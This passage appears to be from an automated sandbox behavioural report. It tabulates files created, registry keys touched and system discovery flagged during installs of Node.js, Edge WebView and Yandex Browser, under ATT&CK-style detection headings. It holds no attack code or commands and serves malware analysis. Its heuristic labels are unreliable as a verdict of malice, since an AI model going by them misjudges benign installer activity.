| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\maps\rainbow.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\EdgeCore\130.0.2849.52\Extensions\external_extensions.json | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4627FEF6-2226-49BA-95FE-11CC67A27D16}\EDGEMITMP_84502.tmp\setup.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\gauge\lib\error.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\npm-registry-fetch\lib\check-response.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\dist\x509\asn1\length.d.ts | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\EdgeCore\130.0.2849.52\identity_proxy\win10\identity_helper.Sparse.Canary.msix | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4627FEF6-2226-49BA-95FE-11CC67A27D16}\EDGEMITMP_84502.tmp\setup.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\readable-stream\lib\ours\errors.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-owner.md | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-team.md | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\src\win_delay_load_hook.cc | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\ssri\lib\index.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\inherits\inherits_browser.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-explore.html | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\metavuln-calculator\lib\advisory.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\readable-stream\lib\stream\promises.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\tuf-js\dist\updater.d.ts | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\gauge\lib\base-theme.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\Temp\EU1BE7.tmp\msedgeupdateres_ga.dll | C:\Users\Admin\AppData\Local\Temp\MicrosoftEdgeWebview2Setup.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\EdgeCore\130.0.2849.52\Locales\am.pak | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4627FEF6-2226-49BA-95FE-11CC67A27D16}\EDGEMITMP_84502.tmp\setup.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\https-proxy-agent\dist\agent.d.ts | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\pacote\lib\registry.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\events\tests\max-listeners.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\emoji-regex\es2015\text.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\postcss-selector-parser\dist\selectors\combinator.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-config.md | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\EdgeCore\130.0.2849.52\Locales\sr-Cyrl-BA.pak | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4627FEF6-2226-49BA-95FE-11CC67A27D16}\EDGEMITMP_84502.tmp\setup.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\unique-slug\lib\index.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\events\tests\once.js | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\EdgeCore\130.0.2849.52\telclient.dll | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4627FEF6-2226-49BA-95FE-11CC67A27D16}\EDGEMITMP_84502.tmp\setup.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmdiff\README.md | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\ieee754\LICENSE | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\glob\LICENSE | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-audit.html | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\just-diff-apply\index.d.ts | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\nodejs\node_modules\npm\node_modules\gauge\lib\base-theme.js | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SystemTemp\scoped_dir9772_1826766264\places.sqlite-journal | C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI2F6.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI2E06.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Tasks\System update for Yandex Browser.job | C:\Program Files (x86)\Yandex\YandexBrowser\24.10.1.598\service_update.exe | N/A |
| File created | C:\Windows\SystemTemp\scoped_dir2176_640501534\explorer.exe | C:\Users\Admin\AppData\Local\Temp\YB_FC3C6.tmp\setup.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Windows\SystemTemp\scoped_dir2176_640501534\explorer.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe | N/A |
| File created | C:\Windows\SystemTemp\scoped_dir9772_1826766264\places.sqlite | C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4627FEF6-2226-49BA-95FE-11CC67A27D16}\EDGEMITMP_84502.tmp\setup.exe | N/A |
| File created | C:\Windows\Installer\e62f5f3.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e62f5f3.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}\NodeIcon | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\yandex_browser_installer.log | C:\Users\Admin\AppData\Local\Temp\YB_FC3C6.tmp\setup.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\scoped_dir9772_1826766264\places.sqlite-wal | C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\yandex_browser_installer.log | C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\24.10.1.598\Installer\setup.exe | N/A |
| File created | C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4627FEF6-2226-49BA-95FE-11CC67A27D16}\EDGEMITMP_84502.tmp\setup.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\yandex_browser_installer.log | C:\Users\Admin\AppData\Local\Temp\YB_FC3C6.tmp\setup.exe | N/A |
| File created | C:\Windows\Tasks\Repairing Yandex Browser update service.job | C:\Program Files (x86)\Yandex\YandexBrowser\24.10.1.598\service_update.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4627FEF6-2226-49BA-95FE-11CC67A27D16}\EDGEMITMP_84502.tmp\setup.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\MsEdgeCrashpad\metadata | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4627FEF6-2226-49BA-95FE-11CC67A27D16}\EDGEMITMP_84502.tmp\setup.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI2A5A.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Tasks\Update for Yandex Browser.job | C:\Program Files (x86)\Yandex\YandexBrowser\24.10.1.598\service_update.exe | N/A |
| File created | C:\Windows\SystemTemp\scoped_dir9772_1826766264\places.sqlite-wal | C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe | N/A |
| File created | C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4627FEF6-2226-49BA-95FE-11CC67A27D16}\EDGEMITMP_84502.tmp\setup.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4627FEF6-2226-49BA-95FE-11CC67A27D16}\EDGEMITMP_84502.tmp\setup.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\yandex_browser_installer.log | C:\Windows\SystemTemp\scoped_dir2176_640501534\explorer.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIFDC5.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI568.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI598.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI2B55.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Users\Admin\AppData\Local\Temp\YB_FC3C6.tmp\setup.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Users\Admin\AppData\Local\Temp\YB_FC3C6.tmp\setup.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\msedge_installer.log | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4627FEF6-2226-49BA-95FE-11CC67A27D16}\EDGEMITMP_84502.tmp\setup.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIC61.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}\NodeIcon | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\scoped_dir9772_1826766264\places.sqlite-shm | C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\scoped_dir9772_1826766264\places.sqlite | C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIFDA4.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIFDB5.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI29EC.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e62f5f7.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4627FEF6-2226-49BA-95FE-11CC67A27D16}\EDGEMITMP_84502.tmp\setup.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIC40.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\24.10.1.598\Installer\setup.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4627FEF6-2226-49BA-95FE-11CC67A27D16}\EDGEMITMP_84502.tmp\setup.exe | N/A |
Subvert Trust Controls: Mark-of-the-Web Bypass
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\Yandex.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\Bootstrapper.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\pin\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\MicrosoftEdgeWebview2Setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\Temp\EU1BE7.tmp\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Yandex.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Yandex\YaPin\Yandex.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Yandex.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133745092782497001" | C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\AppDataLow\Yandex\UICreated_SYSTEM = "1" | C:\Program Files (x86)\Yandex\YandexBrowser\24.10.1.598\service_update.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\AppDataLow\Yandex | C:\Program Files (x86)\Yandex\YandexBrowser\24.10.1.598\service_update.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Program Files (x86)\Yandex\YandexBrowser\24.10.1.598\service_update.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\AppDataLow | C:\Program Files (x86)\Yandex\YandexBrowser\24.10.1.598\service_update.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
